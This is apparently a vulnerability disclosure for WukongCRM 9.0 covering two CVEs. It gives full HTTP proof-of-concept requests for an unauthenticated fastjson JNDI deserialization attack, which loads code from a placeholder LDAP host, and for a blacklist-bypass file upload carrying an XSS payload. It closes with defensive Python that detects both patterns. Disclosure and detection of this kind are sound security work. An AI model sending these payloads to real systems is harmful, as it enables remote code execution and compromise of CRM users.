WukongCRM_9.0.md


Project

Address: WukongCRM-9.0-JAVA

Version: 72crm_9.0.1_20191202

1. Remote code execution vulnerability

CVE-2024-23052

Version 72crm_9.0.1_20191202 ships an insecure component version that allows remote command execution. The vulnerable endpoint is reachable without authentication.

The project uses an insecure version of the fastjson component. The vulnerability is triggered through the following endpoint:

http://localhost:8080/CrmCustomer/queryPageList

The request is handled by the constructor of BasePageRequest, which first calls fastjson's parseObject() to parse the JSON request body into a Java bean. Because this fastjson version has a deserialization vulnerability, an attacker only has to send a malicious JSON string to /CrmCustomer/queryPageList to trigger it. fastjson 1.2.54 has many exploitation paths; only one of them is shown below.

This particular path requires the xbean jar package to be present on the classpath and AutoType to be enabled. Because of problems in the authentication logic, the attacker does not even need an Admin-Token header and can send the request without any authorization. Payload:

```http
POST /CrmCustomer/queryPageList HTTP/1.1
Host: localhost:8080
Content-Length: 115
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip:port/Basic/Command/calc"}
```

2. Arbitrary file upload vulnerability

CVE-2024-23051

Vulnerability location: http://localhost:8080/sysConfig/setSysConfig

setSysConfig() calls the upload() method to store the submitted file.

Script files such as .jsp are only blacklisted here, so bypass techniques give the effect of an arbitrary file upload. Payload:

```http
POST /sysConfig/setSysConfig HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHGXctR7zHEGx8K25
Admin-Token: 5de65397365d43cb8a95a1a5ef176371
Connection: close
Content-Length: 301

------WebKitFormBoundaryHGXctR7zHEGx8K25
Content-Disposition: form-data; name="name"

rwat
------WebKitFormBoundaryHGXctR7zHEGx8K25
Content-Disposition: form-data; name="file"; filename="hello.html"
Content-Type: image/png

<script>alert(1)</script>
------WebKitFormBoundaryHGXctR7zHEGx8K25--
```

The stored value can then be read back:

```http
GET /sysConfig/querySysConfig HTTP/1.1
Host: localhost:8080
Connection: close
```


First we upload a .jsp file.

Accessing the /sysConfig/querySysConfig interface shows whether the upload succeeded: if it did, the stored file path is returned; if not, the original value (rwat) is returned.

The upload folder is empty after this attempt.

Bypass attempt (screenshot omitted).

The upload path is returned.

Next, we upload a file carrying an XSS payload (the hello.html request shown above).
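As an added defender-side example (not code from this advisory or from WukongCRM), the following Python inspects raw HTTP requests for the two patterns described on this page: a fastjson `@type` autotype key in a JSON body sent to /CrmCustomer/queryPageList, and a multipart upload to /sysConfig/setSysConfig whose filename extension falls outside an image allowlist, the check the blacklist-based upload filter should have been. The sample requests, the allowed-extension set and the placeholder LDAP host are constructed assumptions.

```python
import json
import re

# Constructed samples (assumptions) modelled on the two payloads above: fastjson autotype
# JSON to /CrmCustomer/queryPageList, hello.html uploaded as image/png, and a benign query.
SAMPLE_REQUESTS = [
    'POST /CrmCustomer/queryPageList HTTP/1.1\r\nContent-Type: application/json\r\n\r\n'
    '{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://placeholder/x"}',
    'POST /sysConfig/setSysConfig HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----B\r\n\r\n'
    '------B\r\nContent-Disposition: form-data; name="file"; filename="hello.html"\r\n'
    'Content-Type: image/png\r\n\r\n<script>alert(1)</script>\r\n------B--',
    'POST /CrmCustomer/queryPageList HTTP/1.1\r\nContent-Type: application/json\r\n\r\n'
    '{"page":1,"limit":10,"name":"acme"}',
]

# Assumption: the system-config upload only ever needs image files.
ALLOWED_UPLOAD_EXT = {"png", "jpg", "jpeg", "gif"}
FILENAME_RE = re.compile(r'filename="([^"]*)"', re.I)

def has_autotype_key(obj):
    """Recursively look for fastjson's '@type' autotype marker in parsed JSON."""
    if isinstance(obj, dict):
        return "@type" in obj or any(has_autotype_key(v) for v in obj.values())
    if isinstance(obj, list):
        return any(has_autotype_key(v) for v in obj)
    return False

def upload_ext_allowed(filename):
    """Allowlist check on the final extension, case-insensitive; no extension is rejected."""
    _, dot, ext = filename.rpartition(".")
    return bool(dot) and ext.lower() in ALLOWED_UPLOAD_EXT

def inspect_request(raw):
    """Return finding tags for one raw HTTP request; an empty list means nothing flagged."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    findings = []
    if "/queryPageList" in request_line:
        try:
            parsed = json.loads(body)
        except ValueError:
            return ["json-unparseable"]
        if has_autotype_key(parsed):
            findings.append("fastjson-autotype-key")
    if "/sysConfig/setSysConfig" in request_line:
        for name in FILENAME_RE.findall(body):
            if not upload_ext_allowed(name):
                findings.append("upload-ext-not-allowlisted:" + name)
    return findings
```

Run over the three samples, the first two are flagged and the benign paging query passes; the same allowlist function is what the upload handler should apply before calling upload().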